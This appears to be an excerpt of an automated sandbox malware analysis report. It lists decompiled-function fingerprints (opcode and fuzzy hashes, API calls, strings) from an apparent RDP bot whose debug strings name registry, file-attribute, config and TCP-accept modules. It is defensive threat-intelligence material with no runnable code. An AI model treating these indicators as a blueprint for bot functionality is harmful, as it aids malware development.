                                                                    • Opcode ID: d6db790e64e8fd95c482b2daa9a4b4461330f64ac07fb26293559f197ade149f
                                                                    • Instruction ID: dbe3fc4bbdd992102ab85eccccfeb021a6262a57eb0dd1a201190b940fc15b51
                                                                    • Opcode Fuzzy Hash: d6db790e64e8fd95c482b2daa9a4b4461330f64ac07fb26293559f197ade149f
                                                                    • Instruction Fuzzy Hash: 23616D62A0CE47CDFA208B06E8047BD1255AB65778F5411B2E57D672FADE3CE94AC30C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                    • String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                    • API String ID: 2123903355-1944070753
                                                                    • Opcode ID: f8976360e668b1eb4dd755dfaa8c6eaf9c42190652ad6a2f23e823a119935eed
                                                                    • Instruction ID: 7edf758246ac09944d37a651c085ae395482a555b28f97e15ad0eb0088d4bcae
                                                                    • Opcode Fuzzy Hash: f8976360e668b1eb4dd755dfaa8c6eaf9c42190652ad6a2f23e823a119935eed
                                                                    • Instruction Fuzzy Hash: D1416D75A19A438AE750CF6AE44056D3BA9FB49768F440275EE1DC37B8EB7CE440CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                    • String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                    • API String ID: 2123903355-1944070753
                                                                    • Opcode ID: b228bda84fba99ae2280087eb6f4b943d1784af9396ce9abe5c1d3ff242421f7
                                                                    • Instruction ID: e49120e4f22eafd317145f4f5aec78f5c84b1f5d65299cd63072b28dba73f376
                                                                    • Opcode Fuzzy Hash: b228bda84fba99ae2280087eb6f4b943d1784af9396ce9abe5c1d3ff242421f7
                                                                    • Instruction Fuzzy Hash: 1F415471A08A46CEE750CF2AE44056977E0FB18774F000275EE6DA37A9EB3CE945CB04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreate
                                                                    • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                                                                    • API String ID: 2932200918-412249795
                                                                    • Opcode ID: 98782a279192eaa9c0840b79ffaa249c14f7fc1fdf8aba2cdbf856249d37d2f6
                                                                    • Instruction ID: 34e88cf154956bf382535c5b303a1a220478614c3550be97d0d7294aa1a1ecd6
                                                                    • Opcode Fuzzy Hash: 98782a279192eaa9c0840b79ffaa249c14f7fc1fdf8aba2cdbf856249d37d2f6
                                                                    • Instruction Fuzzy Hash: ED51AD62E0CE5381FB318B86E8403BD6269AF447B8F4502BADD4D576B4DF2DE9848781
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreate
                                                                    • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                                                                    • API String ID: 2932200918-412249795
                                                                    • Opcode ID: f0e8cf8de96c9b0d8cd07c3ee6880cb3e66b5c713fc15cc70bf629ac588a6a55
                                                                    • Instruction ID: c4648ad2ff39a1eaea6c107c929dab903d7c6b3f42530dee0c918276693dabf5
                                                                    • Opcode Fuzzy Hash: f0e8cf8de96c9b0d8cd07c3ee6880cb3e66b5c713fc15cc70bf629ac588a6a55
                                                                    • Instruction Fuzzy Hash: FE519EA2E0CE43C9FA229716E4443BC6250AB20774F4402B2D97D776B5DF2CED85C388
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                    • API String ID: 39653677-3852240402
                                                                    • Opcode ID: c4af27749207fe981cf84f54b7efe6540e3b249496424a343f4de97f3f39739e
                                                                    • Instruction ID: 9d3948f76704e286012dca0e9895d0432a26dbc4414df5b1d2e46403b88544f4
                                                                    • Opcode Fuzzy Hash: c4af27749207fe981cf84f54b7efe6540e3b249496424a343f4de97f3f39739e
                                                                    • Instruction Fuzzy Hash: 6C415EA1E18E4791FB129F9AE8507BD335AAF407A8F8884B5D95E072B5DE3CE506C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                    • API String ID: 39653677-3852240402
                                                                    • Opcode ID: eeb99714264be280ecab839d1a2263844cafb9050e92ac6339dbe7ced44462fd
                                                                    • Instruction ID: 1a1492df47454f08ebe2baba66acc3a4a84dd4e07a75fc635529941a8458d422
                                                                    • Opcode Fuzzy Hash: eeb99714264be280ecab839d1a2263844cafb9050e92ac6339dbe7ced44462fd
                                                                    • Instruction Fuzzy Hash: C2413BA1A0CE47C9FA119F16E8453BC6751BF607A4F4841B2DA7D372F6DE7CA9068308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Processstrlen$AllocFree
                                                                    • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                    • API String ID: 1318626975-3508512667
                                                                    • Opcode ID: e65f61464b3325a862f8e32769314e1d84930d9b540647d1102f78bdaa2dba9a
                                                                    • Instruction ID: 3b47ac47e01ff24792c7b58d549cc279c29322560d5eb17a8294f2424788248d
                                                                    • Opcode Fuzzy Hash: e65f61464b3325a862f8e32769314e1d84930d9b540647d1102f78bdaa2dba9a
                                                                    • Instruction Fuzzy Hash: C1314C62A09F4786FB619B93E8103B92359BF41BA4F5840F5DA1E477B5DE3CE9058340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Processstrlen$AllocFree
                                                                    • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                    • API String ID: 1318626975-3508512667
                                                                    • Opcode ID: 9773589267af59d1e2f9a8bebb5b8434600a55e5b6ec7fd4535c89a7be8d36af
                                                                    • Instruction ID: 8c7bba13755ac2151f18807e7ef51e7b47ff7db47d22cfe98a200fb937220c81
                                                                    • Opcode Fuzzy Hash: 9773589267af59d1e2f9a8bebb5b8434600a55e5b6ec7fd4535c89a7be8d36af
                                                                    • Instruction Fuzzy Hash: 47315261A08E47CDFA119B13E9107BD2664AF60BB4F4440B1EA6D377BADF3DE9058348
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcessisspace$memchr
                                                                    • String ID: TRANSIENT$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                                                    • API String ID: 300437936-3670929075
                                                                    • Opcode ID: 9d6196f6c1cc7a6c33c89447fb9574696beb70c7937b6cbc27b436a535a12585
                                                                    • Instruction ID: 2a61000e56641a52e50bd85b5566ed3b7371670b6da06909fd842508c5151ee4
                                                                    • Opcode Fuzzy Hash: 9d6196f6c1cc7a6c33c89447fb9574696beb70c7937b6cbc27b436a535a12585
                                                                    • Instruction Fuzzy Hash: CA516E21F0AF8285FB559B97942077D21AA6F45BA4F1880BCDD5D0B7B5EE3CE4058310
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$ErrorLast
                                                                    • String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                    • API String ID: 365566950-3523202656
                                                                    • Opcode ID: a9c2ed5b2806be12b9350ccfd52f584c6e2761a873669e7e0f832d613a27d6b8
                                                                    • Instruction ID: d7ac48183c28ebc20db333465bd9bd35c13adaee87967955196dd0e88c670801
                                                                    • Opcode Fuzzy Hash: a9c2ed5b2806be12b9350ccfd52f584c6e2761a873669e7e0f832d613a27d6b8
                                                                    • Instruction Fuzzy Hash: 0051A6A1A2DE4785FB218B97E84027D325DAF007BCF5440BAD91E866B5EE6CE845CB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$ErrorLast
                                                                    • String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                    • API String ID: 365566950-3523202656
                                                                    • Opcode ID: f07c7a94da522aa3539270919aa610d4219343fd60f7eb3ab9a52d880d5c2b6b
                                                                    • Instruction ID: ef223af718caec149e93bebb5a3e7f3fd26afbe1958e59b9ba90718e8a70b7aa
                                                                    • Opcode Fuzzy Hash: f07c7a94da522aa3539270919aa610d4219343fd60f7eb3ab9a52d880d5c2b6b
                                                                    • Instruction Fuzzy Hash: D951A061E0CE47CEFA649B13E9402BE6350AF25374F1041B2D97E666B6DF2CE845C709
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                                                    • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                                                    • API String ID: 2278979430-4175654481
                                                                    • Opcode ID: b1022f743a2f32e36fad29669ebae11abbf00a4173a88319de3ccb1d9b5534a7
                                                                    • Instruction ID: 66d72237c09b7b477b4c8bb729a91099e9306b3f4de296d298e71ef66261b748
                                                                    • Opcode Fuzzy Hash: b1022f743a2f32e36fad29669ebae11abbf00a4173a88319de3ccb1d9b5534a7
                                                                    • Instruction Fuzzy Hash: A451CC72A09F8281E7218B56E8803AD7669AB417F4F0443B9E97D076F4EF3DE505CB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Deletefflushfwrite
                                                                    • String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
                                                                    • API String ID: 2939363742-2883486457
                                                                    • Opcode ID: 19f597cc69295e8de2f37fb7281aa2e9243a20abc6b1d7248109f68b491ec34f
                                                                    • Instruction ID: 3a2f2896eae63e1eaec8aa5f1833859fcfa15c1c62d66b697a0f267e7903c63c
                                                                    • Opcode Fuzzy Hash: 19f597cc69295e8de2f37fb7281aa2e9243a20abc6b1d7248109f68b491ec34f
                                                                    • Instruction Fuzzy Hash: DD412962D0CD1381FB21569BA4403FC63596F003B4F8A51BADC5E671B5DEACBD858382
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Deletefflushfwrite
                                                                    • String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
                                                                    • API String ID: 2939363742-2883486457
                                                                    • Opcode ID: 09eaa57c91d6cc6535543957ddd418d7c63991fba1ae61b25518d4ee7d6eebe0
                                                                    • Instruction ID: e3a7b66168865e6b59d730b285aa3a2e2de534aa210806e339c6ee5c937ca59b
                                                                    • Opcode Fuzzy Hash: 09eaa57c91d6cc6535543957ddd418d7c63991fba1ae61b25518d4ee7d6eebe0
                                                                    • Instruction Fuzzy Hash: A1415C62D1CD53D9FA229646A8443FC56406F20774F4901F2CC7E772B6DE2DAE85838D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
